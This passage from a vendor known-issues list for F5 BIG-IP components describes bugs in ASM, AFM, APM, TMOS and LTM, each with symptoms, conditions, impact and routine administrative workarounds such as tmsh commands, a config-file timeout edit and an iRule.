1980601-1 : Number of associated signatures for a signature-set appears zero

Links to More Info: BT1980601

Component: Application Security Manager

Symptoms:
Number of associated signatures for a signature-set appears zero in REST API and GUI.

/mgmt/tm/asm/signature-sets/{UUID} returns 'signatureCount' of which value is incorrectly shown zero.

Signature set screen in the GUI shows list of signature-sets with number of signatures of each sets. This number is incorrectly displayed zero.

Security ›› Options : Application Security : Attack Signatures


This is a cosmetic issue. Signature enforcement is performed for the affected signature-set even though the number is reported as zero. By selecting an affected signature-set in the GUI, you can see the associated signatures.

Conditions:
Via REST API you sent PATCH request to the endpoint /mgmt/tm/asm/signature-sets/{UUID}

The JSON body is badly structured or you sent the same PATCH request twice.

Impact:
Number of signatures is reported as zero for an affected signature-set

Workaround:
Update the endpoint with correctly structured JSON, and change one of the attribute value.


1977057-3 : Memory leak when using an iRule to overwrite MR peer route

Links to More Info: BT1977057

Component: Service Provider

Symptoms:
Messagerouter memory consumption is excessive:

tmctl memory_usage_stat -w 300 | grep 'name\|messagerou'
name allocated max_allocated size slop cur_allocs tot_allocs fail_allocs type caches_used
dns_qname_cache 0 0 1280 255 0 0 0 std:
messagerouter 5384040 5924240 1 0 3253 122000 0 var:

Conditions:
'MR::message route' is used to overwrite peer route.

Impact:
Memory leak possibly leading to system overload/crash.

Workaround:
None


1976925 : Device dos whitelist not working properly for DNS dos protection when BA enabled

Links to More Info: BT1976925

Component: Advanced Firewall Manager

Symptoms:
-- When VLANs are configured in the network-whitelist, TCP traffic was properly bypassed, and DOS attack alarms were not triggered.
-- DNS traffic, despite being sent from whitelisted VLANs, still trigger DOS attack alarms.

Conditions:
-- VLANs assigned to the network-whitelist.
-- Virtual wire mode (vWire) configured with the configured VLAN tags.
-- Behavioral Analysis (BA) is enabled alongside DNS A Query and DNS AAAA Query attack vectors.

Impact:
Despite being whitelisted, DNS queries (e.g., high-volume traffic) trigger DOS detection and mitigation due to improper whitelist logic handling. DNS resolution is disrupted.

Workaround:
None


1976705-1 : Threat Campaign installation fails due to timeout after an hour

Links to More Info: BT1976705

Component: Application Security Manager

Symptoms:
Threat Campaign installation fails. /var/log/tomcat/live_update_upload.log contains a timeout error:

apply_threat_campaigns|INFO|Jun 17 15:30:45.034|29563|F5::LiveUpdate::PayloadHandler::upload,,Start Threat Campaigns
apply_threat_campaigns|ERR|Jun 17 16:30:45.174|29563|F5::LiveUpdate::PayloadHandler::clean_fail,,Fail load update files: TSocket: timed out reading 1024 bytes from 127.0.0.1:9781

Conditions:
- Threat Campaign is licensed
- The larger configuration size it has, the longer the installation process takes, which can lead it reaching 1 hour and timeout
- High load to system resource can contribute as well

Impact:
Threat Campaign fails to be installed

Workaround:
# mount -o remount,rw /usr
# cp /usr/local/share/perl5/F5/ASMConfig/EasyClient.pm /usr/local/share/perl5/F5/ASMConfig/EasyClient.pm.bk
# sed -i 's/recvTimeout => 3600000,/recvTimeout => 7200000,/' /usr/local/share/perl5/F5/ASMConfig/EasyClient.pm
# mount -o remount,ro /usr
# pkill -f asm_config_server


1976689 : Memory Leak in publishing did information

Links to More Info: BT1976689

Component: TMOS

Symptoms:
There was a memory leak in publishing did information - tmm/sdaglib_did_info tmstat table.

Conditions:
This happens during normal operation whenever there's a cmp state transition.

Impact:
Sometimes, -1 npus is outputted in tmctl -d blade tmm/sdaglib_did_info.

Workaround:
None


1976557-2 : [APM][OAUTH][LOGGING]Error log needed misconfigured "audience" for apm oauth jwt-config

Links to More Info: BT1976557

Component: Access Policy Manager

Symptoms:
When "audience" for apm oauth jwt-config misconfigured, oauth scope fails with error log :
OAuth Scope: failed for jwt-provider-list '/Common/JWTProvider' , error: None of the configured JWK keys match the received JWT token, JWT Header:

This log does not provide the correct reason for failure.

Conditions:
OAuth with JWT keys configured.

1)configure wrong audience in apm oauth jwt-config
apm oauth jwt-config /Common/auto_jwt_Provider {
allowed-keys {
/Common/auto_jwk_Provider1 { }
/Common/auto_jwk_Provider2 { }
/Common/auto_jwk_Provider3 { }
}
allowed-signing-algorithms { RS256 }
audience { da21849e-b50c-4673-917f-cb11ef9a0891 } <------------wrong------------
auto-generated true
issuer <issuer_uri>
jwks-uri <jwks_uri>
}

Impact:
Logging clarity

Workaround:
None


1976513-2 : Some ASM entity names are not shown in the REST error response message

Links to More Info: BT1976513

Component: Application Security Manager

Symptoms:
A REST response of patching a hostname for Virus Detection Server is missing ASM entity name "hostname" in the error message

Conditions:
A REST request is made on a specific ASM entity and error response is returned

Impact:
The error message in REST response may be unclear

Workaround:
None


1976429-2 : Webroot database file updates are failing to apply, preventing the creation of a new version of the database file.

Links to More Info: BT1976429

Component: Traffic Classification Engine

Symptoms:
Webroot database partial updates, which are expected to occur every 24 hours, will fail. As a result, the Webroot database file version does not change.

Conditions:
Any release with fix for ID1295041.

Impact:
The Webroot database is missing partial updates.
Any URL added, deleted, or updated as part of a partial update will be missing from the Webroot database file.
Any security issue fixed in the Webroot database will also be absent from the database.

Workaround:
None


1976113 : Deployment of BIG-IP Best Plus Images on Azure Fails with OSProvisioningClientError

Links to More Info: BT1976113

Component: TMOS

Symptoms:
When deploying BIG-IP Best Plus images in Azure, the deployment process fails with the following error message:

Status: "OSProvisioningClientError"
Message: "SSH host key generation failed. Error details: [ProvisionError] Failed to generate ssh host key: ret=255, out= /config/ssh/ssh_host_rsa_key.pub is not a public key file."
Despite this error, the VM may still allow SSH login, causing confusion about the actual deployment status.

Conditions:
- Occurs during provisioning of BIG-IP Best Plus images in Azure.
- The error is related to SSH key generation timing during the provisioning process.

Impact:
- Deployment status is reported as Failed even though the VM is accessible via SSH.
- Automation workflows relying on successful provisioning status may break.
- Users may assume the deployment is unusable, leading to unnecessary troubleshooting or redeployment.

Workaround:
- After receiving the error, verify if the VM is accessible via SSH.
- If accessible, you can proceed with manual configuration.


1976001-1 : PEM::session TCL commands can cause cores

Component: Policy Enforcement Manager

Symptoms:
Tmm cores, with a segmentation fault.

Conditions:
Occurs when
* PEM::session commands are used in an iRule.
* tmm is busy, and the queue_drops field in tmm/cmp stat table is not zero.

Impact:
Traffic interruption as tmm restarts.

Workaround:
None


1975945-1 : IPS signatures and compliance not loaded until the configuration is saved using tmsh save sys config

Links to More Info: BT1975945

Component: Protocol Inspection

Symptoms:
Signatures and compliances are not updated properly in bigip.conf

Conditions:
- Check the signatures and compliances count in bigip.conf
- Upgrade/downgrade IPS im package
- Check the signatures and compliances count in bigip.conf

Impact:
Updated signatures are not used until the configuration is saved.

Workaround:
Manually save the configuration:
tmsh save sys config


1975941-2 : Alternate_response_content length greater than 51200 in ACCOUNT_ALTERNATE_RESPONSE_FILE causing ASM restart loop

Links to More Info: BT1975941

Component: Application Security Manager

Symptoms:
Bd goes into a restart loop

Conditions:
Custom response body configured with tokens present and length becomes greater than 51200 after replacing tokens with their respective values.

Impact:
Bd constantly restarts. Traffic disrupted while bd restarts.

Workaround:
Reduce the size of response body less than 51200


1975885 : Massive M_ACCESS string leak in TMM

Links to More Info: BT1975885

Component: Access Policy Manager

Symptoms:
Memory leak while deleting apm session.

Conditions:
-- Running a version that fixed ID 1672257 (currently version 17.5.0)
-- Access sessions are deleted

Impact:
Increase in tmm memory

Workaround:
None


1974869-2 : Unable to load config after upgrading to v17.5.0 with the Syntax Error: "state" may not be specified more than once.

Links to More Info: BT1974869

Component: Advanced Firewall Manager

Symptoms:
After upgrading a BIG-IP AFM device from version 16.1.5.1 to 17.5.0, the device fails to come online.

effected vectors:
bad-tcp-flags-malformed
tcp-ack-ts
tcp-flags-uncommon

Conditions:
Set the all network device-config vectors into detect-only state and then initiate upgrade from v16.1.5.1 to v17.5.0

Impact:
The BIG-IP device fails to load its configuration and does not come online after the upgrade.

Workaround:
-manually remove the duplicate state entry in bigip.conf.
-perform "tmsh load sys config verify" or reboot


1974837-1 : MAIN|EROR|dosl7_hold_message:1004|trying to hold message already held

Links to More Info: BT1974837

Component: Application Security Manager

Symptoms:
Error log messages appear /var/log/tmm:

tmm log "MAIN|EROR|dosl7_hold_message:1004|trying to hold message already held"

Conditions:
-- Bot defense profile is attached to a virtual server
-- A request is sent with a trusted bot signature and requires a rDNS.
-- During the verification, the connection is closed.

Impact:
Errors in logs.

Workaround:
None.


1974701-1 : PVA stats may be double incremented when pva mode is dedicated

Links to More Info: BT1974701

Component: TMOS

Symptoms:
Offloaded connections may be double counted for dedicated PVA flows.

Conditions:
PVA mode is set to dedicated in fastl4 profile.

Impact:
Incorrect stats.

Workaround:
None


1972541-1 : Tmsh load sys config verify leaks compiled ltm (CPM) policies

Links to More Info: BT1972541

Component: Local Traffic Manager

Symptoms:
When LTM (CPM) policies are in use on virtual servers and 'tmsh load sys config verify' is used, memory in /dev/shm is leaked each time the verify command is used.

With multiple uses and many virtual servers with policies this could lead to the BIG-IP system having low memory and suffering from low memory symptoms (see impact).

df -h may show /dev/shm/ having abnormally high use.
cat /proc/meminfo may show abnormally high shmem, and low memory indicated by low MemAvailable. These statistics are also available in qkviews loaded on iHealth.

Conditions:
-- LTM (CPM) policy attached to one or more virtual servers
-- Use of 'tmsh load sys config verify'

Impact:
The amount of shared memory leaked at each use of 'tmsh load sys config verify' is typically:

Number of virtual servers with attached policies * 4KB.

Very large or complex policies may be a multiple of 4KB.

The number of compiled LTM policies in shared memory is:
ls -1 /dev/shm | grep loipc_vs_ | wc -l

There should be one for each virtual server with LTM policies.

Low memory symptoms can include:
- sluggishness to loss of contact when managed via GUI (web interface) or tmsh/bash over ssh
- poor process scheduling which may lead to daemons being aborted by software watchdog leading to production of core files.
- oom killer activity, where processes are terminated by kernel to free memory as an emergency measure
- loss of service
- reboot if symptoms develop fully into protracted thrashing

Workaround:
Reboot of the system will clear the leaked memory.


1972465-1 : LTM Syncookie always SW mode for a wildcard virtual server

Links to More Info: BT1972465

Component: TMOS

Symptoms:
LTM Syncookie mode is stuck in software only for a virtual server.

Conditions:
- LTM provisioned, no AFM
- Two identical virtual servers listening on different VLANs
- SYN flood on both virtuals

Impact:
One virtual server is in hardware SYN cookie mode, the other is in software SYN cookie mode.

Workaround:
tmsh modify sys db pvasyncookies.preferhwlmode value true
reboot


1972369-1 : A specific performance improvement

Links to More Info: BT1972369

Component: Application Security Manager

Symptoms:
A specific performance issue that can be fixed is happening on a basic structure used throughout the bd.

Conditions:
ASM configured and passing traffic

Impact:
Higher than necessary CPU utilization.

Workaround:
None


1972321-2 : "IP Reputation" option does not show up when creating a rule in LTM policy

Links to More Info: BT1972321

Component: TMOS

Symptoms:
The dropdown menu does not contain the option "IP Reputation" when creating a rule in LTM policy from the GUI.

Conditions:
License shows "IPI" as the active module instead of "IP Intelligence".

Impact:
The user is unable to select "IP Reputation" when creating a rule in an LTM policy from the GUI.

Workaround:
The rule can still be created through tmsh.

create ltm policy Drafts/test rules add { rule1 { conditions add { 0 { iprep all client-accepted values { "Spam Sources" } } } } }


1972273-2 : [F5OS tenant] Adjusting VLAN mtu (or description) throws MCP validation error VLAN /Common/vlan has an id of X, and customer-tag of none and it cannot be used by VLAN /Common/vlan

Links to More Info: BT1972273

Component: TMOS

Symptoms:
Attempting to adjust the MTUs (or any other attribute) of VLANs in a virtual-wire on an F5OS tenant fails with an error message:
VLAN /Common/vlan has an id of X, and customer-tag of none, so it cannot be used by VLAN /Common/vlan

With both VLAN objects mentioned being the same VLAN.

Conditions:
Virtual-wire configuration on F5OS tenant.

Impact:
Unable to operationally manage device and add descriptions or adjust MTUs in virtual-wire configurations on the tenant due to MCPD validation.

Workaround:
Save the configuration, edit bigip_base.conf and add a "mtu <value>" in each of the VLANs, and then load the configuration.


1971217-1 : False negative with illegal redirect attempt

Links to More Info: BT1971217

Component: Application Security Manager

Symptoms:
ASM does not block illegal redirect attempt in a certain scenario

Conditions:
Occurs with a specific configuration on ASM and a specific server redirect response .

Impact:
False negative.

Workaround:
None


1970969-1 : Stale Record Answers counter increments for SERVFAIL responses from DNS resolver cache

Links to More Info: BT1970969

Component: Global Traffic Manager (DNS)

Symptoms:
Stale Record Answers counter increments incorrectly when no stale record is served and a SERVFAIL is sent.

Conditions:
-- Configure DNS cache resolver with a forwarder.
-- Make sure forwarder does not respond to DNS queries.
-- Enable 'ltm dns cache global-settings serve-expired'
-- Send a few DNS requests to DNS cache for a record which is to be handled by not responding forwarder.
-- Observe 'Stale Record Answers' counter for DNS cache.

Impact:
Leads to incorrect Stale Record Answers stat, potentially misleading monitoring, troubleshooting, and operational decisions.

Workaround:
None


1970193-2 : Case WAF policy IP address exception list on GUI: Missing Route Domain ID in the IP address

Links to More Info: BT1970193

Component: Application Security Manager

Symptoms:
WAF policy misses route domain ID in IP exception addresses list on the GUI.

Conditions:
Different WAF policies belonging to different partitions have route domain ID associated with IP addresses.

Impact:
Cosmetic, route domain ID not available in IP address exception list on GUI.

Workaround:
None


1969945-2 : Stats_rate changes along with Detection Threshold for NXDOMAIN DoS vector

Links to More Info: BT1969945

Component: Advanced Firewall Manager

Symptoms:
Lowering the threshold reduces the stats_rate, and increasing the threshold increases the stats_rate.

Conditions:
The detection threshold for the NXDOMAIN Query vector is modified (e.g., from 2000 to 200 or vice versa).
Constant DNS traffic is being generated and sent to the BIG-IP device (e.g., using dnsperf)

Impact:
Inaccurate stats_rate values for the NXDOMAIN Query vector

Workaround:
None


1969889 : Expired certificates sent to clients by tmm due to network time synchronization

Links to More Info: BT1969889

Component: Local Traffic Manager

Symptoms:
Clients are receiving certificates that are expired or invalid, leading to SSL handshake failures accompanied by security warnings.

Conditions:
-- A virtual server configured with ClientSSL and ServerSSL profiles, both having SSL forward proxy enabled, experiences a change in system time (time advanced) due to a network glitch or issue.

Impact:
Clients receiving expired/invalid certificates causes traffic disruption.

Workaround:
From TMSH, Running the following command will delete the cached certificates associated with the specified virtual server and client SSL profile.

(tmos)# delete ltm clientssl-proxy cached-certs virtual <name> clientssl-profile <name>


1969873-2 : IP reputation status is only available on primary blade

Links to More Info: BT1969873

Component: TMOS

Symptoms:
When executing the tmsh show sys iprep command on secondary blades in a VIPRION setup, it does not show output. However, running the same command on the primary blade shows IP reputation statistics as expected.
Secondary blades are expected to act as workers, with all reporting intended to occur on the primary blade.

Conditions:
1) The system is configured for IP reputation database downloads.
2) The tmsh show sys iprep command is executed on secondary blades where the /var/tmstat/blade/iprepd_stats file is not available.

Impact:
On secondary blades, users cannot see the iprep status

Workaround:
IP reputation status can be checked on the primary blade.


1969861-1 : [APM][NTLM]ECA core SIGSEGV

Links to More Info: BT1969861

Component: Access Policy Manager

Symptoms:
ECA cores repeatedly

Conditions:
NTLM Configuration in APM

Impact:
Cannot process NTLM traffic.

Workaround:
None


1968237-2 : Configuration fails to load post upgrade due to invalid DoS signature predicate 'ip flags'

Links to More Info: BT1968237

Component: Advanced Firewall Manager

Symptoms:
After upgrading from v16.1.4.1 to v17.1.2.2, both device slots remain in an offline state.
Configuration fails to load due to a DoS signature issue (/Common/dos_Sig).
The system throws the following error:
>01071cc8:3: Dos Signature (/Common/dos-common/Sig_69253_39_1737834503): Arg (Fragmented) for predicate 'IP Flags' is invalid for DNS/NETWORK signature.

Conditions:
-- DoS signatures are configured using persistence-based predicates such as ‘IP Flags’.
-- Configuration executed via tmsh commands as outlined in the documentation:
https://clouddocs.f5.com/cli/tmsh-reference/v15/modules/security/security_dos_dos-signature.html
-- This can be configured via the GUI as well
-- Issue occurs when upgrading from 16.1.4.1 to 17.1.2.2.

Impact:
Device will be in offline state Post Upgrade

Workaround:
None


1968193-1 : Management Route name displayed incorrectly via API when the route name contains a forward slash (/)

Links to More Info: BT1968193

Component: TMOS

Symptoms:
Management route names that include a forward slash (/) are displayed incorrectly when queried through the API, showing only the netmask instead of the full name. However, the route name displays correctly when viewed using tmsh.

Conditions:
- A management route is created with a name that contains a forward slash (/), commonly seen when incorporating the network and subnet mask into the name, such as "10.10.10.0/24". Any other attempt to specify forward slash in the name will return a validation error.

- When queried via API, the name is inaccurately truncated to display only the netmask rather than the full route name.

Impact:
This issue does not affect the operational functionality of the management route. However, administrative challenges may arise due to the API returning an incomplete route name.

Workaround:
To avoid this issue, refrain from using a forward slash (/) in the name when defining a management route.


1968169-2 : [APM][CitrixIntegration]Apps do not launch unless "Accounts" is selected in Citrix Workspace App

Links to More Info: BT1968169

Component: Access Policy Manager

Symptoms:
After entering credentials, the Citrix app does not launch unless clients select the "Account" in the Citrix Workspace App "Settings".

Conditions:
-- APM and Citrix integraton
-- Accessing Citrix Workspace app
-- The client is rebooted or changes networks

Impact:
Citrix apps are not downloading.

Workaround:
Clients that are affected can log out and back in.

You can work around this on the BIG-IP system by applying an iRule which adds the header "X-Citrix-Gateway: <value>" to the server side


when HTTP_REQUEST {
if {[HTTP::header exists "X-Citrix-Gateway"]} {
set origin_header [HTTP::header value "X-Citrix-Gateway"]
} else {
set origin_header ""
}
}

when HTTP_REQUEST_SEND {
if {$origin_header ne ""} {
HTTP::header insert "X-Citrix-Gateway" $origin_header
HTTP::header insert "X-Citrix-Via" $origin_header
}
}


1967589-2 : Using tmsh to query iControl REST (tmsh list mgmt ...) commands consume an auth token and does not get removed immediately

Links to More Info: BT1967589

Component: TMOS

Symptoms:
Executing tmsh commands that interact with the REST configuration module (e.g. "tmsh list mgmt ...") consume a REST token. These tokens are not released automatically by tmsh once the command finishes executing.

Running commands like "tmsh list mgmt shared authz tokens" repeatedly can cause all 100 tokens to be consumed.

Conditions:
Execute command on terminal "tmsh list mgmt shared authz tokens"

Impact:
Once the token limit is exhausted, they will only expire after 20 minutes. If a configured token limit is reached, no users can log in until those tokens expire.

Workaround:
Workaround #1: use the REST API.
curl -sku user:password -X GET https://aa.bb.cc.dd/mgmt/shared/authz/tokens | jq .

Workaround #2:
Run the commands in an interactive tmsh session.


1967293-3 : Re-configuring BFD multihop for a BGP peer does not work reliably.

Links to More Info: BT1967293

Component: TMOS

Symptoms:
When changing the BFD multihop configuration of a BGP peer, the previously existing BFD session might not be cleared properly preventing a new session from getting established.

Conditions:
Change the BFD multihop configuration of a BGP peer.

Impact:
Unable to establish BFD session.

Workaround:
Remove the BFD completely, then apply a new config.


1967261-3 : RDP Parameter "enablerdsaadauth" when added to RDP setting causes file to be corrupted

Links to More Info: BT1967261

Component: Access Policy Manager

Symptoms:
When RDP parameter "enablerdsaadauth:i:1" is added to RDP custom settings in Remote desktop resource configuration, user is unable to access VDI resources due to signature validation failure on client.

Conditions:
1. APM VDI is configured for MSRDP
2. Custom parameter "enablerdsaadauth:i:1" is added in Remote desktop resource configuration.

Impact:
User is unable to access remote desktop using Microsoft RDP file, through APM.

Workaround:
None


1967213-2 : Active contexts accumulate while HTTP is waiting for response

Links to More Info: BT1967213

Component: Protocol Inspection

Symptoms:
Tmm crashes while processing 100-Continue.

Conditions:
This can occur while processing a 100-continue server response.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
None


1966941-2 : High CPU or increased translation errors following upgrade or restart when DAG distribution changes

Links to More Info: BT1966941

Component: TMOS

Symptoms:
Dagv2 tables are randomized and may change when a tmm is restarted. This can result in a change of traffic distribution, which in some cases may lead to traffic disruption.

The specific condition when this option was introduced is using a CGNAT pool that is not large enough.

Other ways of encountering include increased translation failed errors following an upgrade or restart or blade replacement.

Conditions:
Tenant tmm is restarted (or VELOS chassis rebooted)

Impact:
- dag distribution changes which may cause a traffic disruption.

Workaround:
You can restart tmm until the distribution is good, which can be checked using tools like cmp_dest.


1966669-2 : [PVA] Provide a DB variable disabling NAT46/64 snoop inserts.

Links to More Info: BT1966669

Component: TMOS

Symptoms:
Starting from version 16.X NAt64/46 traffic can be accelerated in PVA. Under some circumstances this is not desired. A DB variable is needed to disable NAt64/46 offload to hardware.

Conditions:
- Nat46/64 configured on virtual-servers eligible for hardware offload.
- Version 16.X or above.

Impact:
Hardware offload of Nat64/46 traffic is not desired in some cases.

Workaround:
None


1966589-2 : Changes to fixup scripts breaks schema upgrade

Links to More Info: BT1966589

Component: TMOS

Symptoms:
Fixup scripts breaks schema upgrade

Conditions:
Upgrade BIG-IP from one version to another version

Impact:
Configuration fails to load

Workaround:
None


1966313-2 : Websocket event logs show "N/A" for virtual server name except during upgrade request

Links to More Info: BT1966313

Component: Application Security Manager

Symptoms:
Remote logging for WebSocket traffic may display "N/A" in the vs_name field for messages other than the initial upgrade request.

Conditions:
Occurs when using a remote logging profile in CSV format with ASM and WebSocket traffic on a configured virtual server.

Impact:
Log entries may lack clarity or traceability due to missing virtual server name information, potentially complicating monitoring and troubleshooting.

Workaround:
None


1966053-1 : MCPD memory leak in firewall

Links to More Info: BT1966053

Component: TMOS

Symptoms:
Viewing virtual server firewall policy rules leaks some memory in MCPD.

Conditions:
- BIG-IP AFM is provisioned
- Virtual server firewall policy rules are viewed, e.g. by running one of the following commands

'tmsh show security firewall policy rules { }'

Impact:
A memory leak occurs when the command is run.

Workaround:
None


1965497 : Firewall Policy is not effective when the same rule list is attached to two different firewall policies.

Links to More Info: BT1965497

Component: Advanced Firewall Manager

Symptoms:
Two Network Firewall Policies (with the same rulelist) being attached to two different VIPs are behaving differently.

Conditions:
1. Create 2 virtual servers
2. Define 1 Rule list on network firewall policy that involves "Zone" config
3. Define 2 network firewall policies and refer the Rule list that created on previous step
4. Configure each network firewall policy on each IP forward virtual
5. Check connectivity from a client. One of the virtual rejects the request.

Impact:
The firewall policy shows varied enforcement behavior on the Virtual Server.

Workaround:
Use different rules in each rule list and add for different firewall policies.
Or
In any one of the Firewall Policy add dummy rule at the end.
Or
Update the configuration on a working Virtual Server.
Ex:
a. Navigate to Local Traffic ›› Virtual Servers : Virtual Server List ›› VS
b. Toggle Network Firewall Enforcement Mode to disabled.
c. Hit update button.
d. Toggle Network Firewall Enforcement Mode back to enabled.


1965329-1 : TMM may crash when re-declaring an LTM policy with a data-group

Links to More Info: BT1965329

Component: Local Traffic Manager

Symptoms:
TMM may crash when re-declaring an LTM policy with a data-group.

Conditions:
-- AS3 declaration that has a VIP with an LTM policy that uses a data-group.
-- The policy is re-declared while there is traffic on the VIP

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Declare while no traffic is on the VIP
Use iRules instead of LTM policies to access the data-group


1965257-1 : Upgrade to 17.5.0 results in Invalid subscription request from (%localdbmgr) unknown class/struct tag (4576) error is seen in ltm log

Links to More Info: BT1965257

Component: Access Policy Manager

Symptoms:
Error log in /var/log/ltm:
 Invalid subscription request from (%localdbmgr) unknown class/struct tag (4576)

Conditions:
BIG-IP's version is 17.5.0 or greater

Impact:
Localdbmger may not be able to fetch the correct cluster size specific to products.

Workaround:
None


1964933-2 : HTTP2 RST flood detection should allow for legitimate case

Links to More Info: BT1964933

Component: Local Traffic Manager

Symptoms:
In some cases, an HTTP2 client might get its TCP connection terminated.

Conditions:
Client is sending RST STREAM with error code CANCEL for example, but it is sent after the server has completed sending its data for the associated stream.

All RST STREAM are subject to RESET stream flood detection.

Impact:
Performance impact.

Workaround:
None


1962813-4 : The csyncd daemon on one or more of the cluster's secondary blades does not synchronise RRD files from the primary

Links to More Info: BT1962813

Component: Local Traffic Manager

Symptoms:
Following a boot into a different software volume, occasionally csyncd on one or more secondary blades stops syncing most of the RRD files from the primary blade's /var/rrd/ directory to the local /var/rrd/ .
The RRD files are used to generate the graphs in the BIG-IP GUI.

Conditions:
- Cluster running one of the affected versions.

- Boot into a newly installed software volume, or into an already existing but different software volume.

- Primary blade ownership change after the boot.

Impact:
Some of the RRD files stop being synchronised from the primary blade to one or more of the secondary blades.

After a primary blade ownership change, graphing data from the other blades (up to the point when the secondary blade became primary) is unavailable in the GUI and whenever a qkview is generated.

Workaround:
Restart the statsd daemon from the primary blade with:
"bigstart restart statsd".


1962073-1 : Creation of file type entries with trailing and/or leading spaces is allowed via REST in ASM policy

Links to More Info: BT1962073

Component: Application Security Manager

Symptoms:
Duplicate 'File Type' entries seen in ASM policy

Conditions:
'File Type' entries in ASM policy created via REST

Impact:
'File Type' protection do not work as expected

Workaround:
Delete the existing entries and add them via GUI


1959785-2 : BIG-IP incorrectly marked as "Managed by BIG-IQ" by its BIG-IP HA peer

Links to More Info: BT1959785

Component: TMOS

Symptoms:
Managed by BIG-IQ" message on Standby BIG-IP is incorrectly displayed on the standby device that is not managed by BIG-IQ.

Conditions:
Steps to Reproduce:

- On BIG-IQ, navigate to "Devices >> BIG-IP DEVICES", only add the active BIG-IP device.
- The standby device will be marked as "Managed by BIG-IQ" on the top left corner of the GUI.


Expected Results:

When active device only managing by the BIG-IQ, standby device should not by shown as "Managed by BIG-IQ"

Impact:
The "Managed by BIG-IQ" message on Standby BIG-IP is misleading since it has not been added/managed by CM.

Workaround:
None


1959709-3 : "Europe" IPs are allowed despite blocking all European countries

Links to More Info: BT1959709

Component: Application Security Manager

Symptoms:
Blocked Europe IP being allowed to access the web service

Conditions:
In ASM policy, configure to block all European countries. Thus any IP from 'Europe' should be blocked.

Impact:
IP access to the web service is allowed, which was supposed to be blocked.

Workaround:
None


1959629-1 : CSR generation via the GUI removes Subject Alternative Name (SAN) string. Also, when SAN is configured with small prefix chars "dns:", no error is thrown.

Links to More Info: BT1959629

Component: Local Traffic Manager

Symptoms:
1) The GUI does not throw an error when subject alternative name is set with lower case prefix "dns:".
2) The GUI does not set SAN strings while generating CSR on GUI. (this does not occur on 17.1.2.2)

Conditions:
-- Use the GUI to create a CSR which is to be signed by other CA, setting "Subject Alternative Name (SAN)" strings with prefix "dns:" in lower case instead of "DNS:".

In this case, the CSR is generated but an error should occur.


-- Use the GUI to create a CSR with a SAN string containing the correct prefix with capitalized "DNS:".

In this case, CSR generation finishes with no error. However, looking at generated CSR, the SAN field is omitted.

Impact:
An invalid certificate is created.

Workaround:
Create the CSR via tmsh (tmsh create sys crypto csr) instead of the GUI


1959361 : When running a tenant with more than 72 VCPUs / cores, adminstall crashes

Links to More Info: BT1959361

Component: Application Visibility and Reporting

Symptoms:
When running a tenant with more than 72 VCPUs / cores, adminstall crashes.

Conditions:
When ASM provisioned and running a Tenant with more than 72 VCPUs / cores per blade.

Impact:
DOSL7 (BADOS) is not functioning. Core created.

Workaround:
None


1958033-1 : MCPD validates only one ssl profile when a virtual server attached to http/2 profile with enforce-tls-requirements enabled along with multiple clientssl profiles with anyone has renegotiation option enabled

Links to More Info: BT1958033

Component: TMOS

Symptoms:
Configuration of HTTP/2 profile with enforce-tls-requirements enabled and a client-ssl profile with renegotiation enabled is sometimes allowed, when it should throw an error.

When 'Enforce TLS Requirements' in a HTTP/2 profile is configured on a virtual server, the 'TLS Renegotiation' option needs to be disabled in the SSL profiles on that virtual server.

But in some cases, the configuration is accepted without error even when renegotiation option is enabled on the SSL profile.

Conditions:
-- Virtual server with HTTP/2, HTTP, and client SSL profiles (any one of the profiles has renegotiation enabled).

1. Enable the 'Enforce TLS Requirements' option in the HTTP/2 profile (by default it is enabled).
2. Add multiple client SSL profile with 'TLS Renegotiation' enabled.
3. Save the configuration.

Its not throwing the error.

Impact:
Configuration of http/2 profile with enforce-tls-requirements enabled and client SSL profile with renegotiation enabled and when these profiles are added to the virtual server, a configuration error occurs:

01070734:3: Configuration error: In Virtual Server (/Common/testVS) an http2 profile with enforce-tls-requirements enabled is incompatible with client ssl profile '/Common/testssl2'; renegotiation must be disabled

Workaround:
None


1957977-2 : Auto-learned DoS Vector attack is detected even with low rate of traffic on HA Pair during Failover

Links to More Info: BT1957977

Component: Advanced Firewall Manager

Symptoms:
After upgrading BIG-IP AFM from 15.1.8 to 17.1.2, DoS vectors (especially "Non TCP connection") are triggered and start attack detected, even though there is no actual attack or stress (CPU usage is low). The detection threshold is set to 0, causing false positives.

Conditions:
-- Upgrade from 15.1.8 to 17.1.2 (with EHF/instrumented TMM).
-- Device becomes Active after upgrade/failover.
-- AFM Device DoS vectors in Fully Auto mode.

Impact:
Logs show attack detection with thresholds at 0, despite no actual stress or attack. This leads to immediate and incorrect attack detection, causing false alarm even when there is no actual attack or system stress.

Workaround:
None


1957157-1 : [nlad]OpenSSL: DRBG Continuous RNG test failed: DRBG stuck.

Links to More Info: BT1957157

Component: Access Policy Manager

Symptoms:
You may observe below logs in /var/log/ltm
ltm.1:May 17 17:42:28 sgb006-e-pr-lb01.77robinson.sg.westpac.com.au err nlad[31252]: OpenSSL: DRBG Continuous RNG test failed: DRBG stuck.
ltm.1:May 17 17:42:28 sgb006-e-pr-lb01.77robinson.sg.westpac.com.au err fips_monitor[19162]: 01da0011:3: SelfTest/Integrity test failure detected, triggering reboot action

Conditions:
Conditions are unknown

Impact:
Unexpected reboot causing disruption to traffic and failover.

Workaround:
None


1953369-1 : DB monitor queries repeatedly if recv string configured but response does not match

Links to More Info: BT1953369

Component: Local Traffic Manager

Symptoms:
A database monitor (mssql, mysql, oracle, postgresql) may send multiple queries to the database server in quick succession if the monitor is configured with a 'recv' string, but the response from the server does not contain the configured string.

Conditions:
-- A database monitor (mssql, mysql, oracle, postgresql) is configured with a 'recv' string.
-- The query to the database server completes successfully, but the response does not contain the configured 'recv' string.

Impact:
The database monitor correctly marks the configured pool member 'DOWN' as appropriate, but generates unnecessary queries to the database server.

Workaround:
None


1953273-1 : Big3d high CPU with thousands of https monitors with SNI

Links to More Info: BT1953273

Component: Global Traffic Manager (DNS)

Symptoms:
Big3d high CPU utilization occurs

Conditions:
Large volume of https monitors and monitored resources with SNI configured.

Impact:
Big3d high CPU utilization

Workaround:
None


1952881-1 : Tmm memory leak in SCTP metadata

Links to More Info: BT1952881

Component: Service Provider

Symptoms:
Tmm crashes on out of memory.

Conditions:
Virtual server configured with a sctp profile and a legacy diameter profile.

Impact:
Traffic disrupted while tmm restarts.

Workaround:
Use the recommended message routing framework (MRF) Diameter solution instead of the legacy diameter (MBLB) profile.


1952821-2 : WAF guided configuration shows a warning message instead list of available configurations

Links to More Info: BT1952821

Component: Application Security Manager

Symptoms:
